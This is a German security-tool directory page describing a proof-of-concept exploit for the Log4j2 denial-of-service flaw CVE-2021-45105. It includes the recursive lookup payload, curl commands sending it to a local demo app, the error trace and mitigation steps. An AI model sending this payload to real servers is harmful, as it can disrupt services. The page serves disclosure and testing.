Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Log4j_dos_CVE-2021-45105 — PoC-Exploit für CVE-2021-45105 (Log4j2 DOS) mit Spring-Boot-Web-App, der eine Endlosschleife mittels präparierter HTTP-Header-/Body-Payloads demonstriert. | Kitploit
Tools/GitHubGitHub/cckuailong/log4j_dos_cve-2021-45105
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubcckuailong/log4j_dos_cve-2021-45105

Log4j_dos_CVE-2021-45105

PoC-Exploit für CVE-2021-45105 (Log4j2 DOS) mit Spring-Boot-Web-App, der eine Endlosschleife mittels präparierter HTTP-Header-/Body-Payloads demonstriert.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
131vor 4 JahrenNoch nicht geprüft
Teilen

Log4j2 DOS (CVE-2021-45105)

Poc

root@kitploit:~
${${::-${::-$${::-$}}}}

Betroffene Versionen: alle Versionen von 2.0-beta9 bis 2.16.0

Diese Anwendung basiert auf einer Spring Boot Webanwendung, die anfällig für CVE-2021-45105 ist

Sie verwendet Log4j 2.16.0

Ausführen der Anwendung

Führen Sie es aus:

root@kitploit:~
Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

Exploit-Schritte

  • Dann lösen Sie den Exploit aus mit:
root@kitploit:~
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${${::-${::-$${::-$}}}}"
}'
  • Beachten Sie die Ausgabe, die eine Endlosschleife zeigt. In Tests wurde jedoch nicht festgestellt, dass dieser DoS ressourcenintensiv ist, da die Endlosschleife vom Programm erkannt wird und zu einem Fehler führt:
root@kitploit:~

 ${ctx:apiVersion} ${ctx:clientRef}2021-12-18 14:29:56,759 http-nio-8080-exec-1 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-j}}: :
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
	

Maßnahmen zur Risikominderung :

Benutzer von Java 8 (oder höher) sollten auf Version 2.17.0 aktualisieren.

Alternativ kann dies in der Konfiguration entschärft werden:

Ersetzen Sie in PatternLayout der Logging-Konfiguration Context Lookups wie ${ctx:loginId} oder $${ctx:loginId} durch Thread Context Map Patterns (%X, %mdc oder %MDC).

Entfernen Sie andernfalls in der Konfiguration Verweise auf Context Lookups wie ${ctx:loginId} oder $${ctx:loginId}, wenn sie aus Quellen außerhalb der Anwendung stammen, wie z. B. HTTP-Header oder Benutzereingaben.

Referenz

https://issues.apache.org/jira/browse/LOG4J2-3230

Tool herunterladen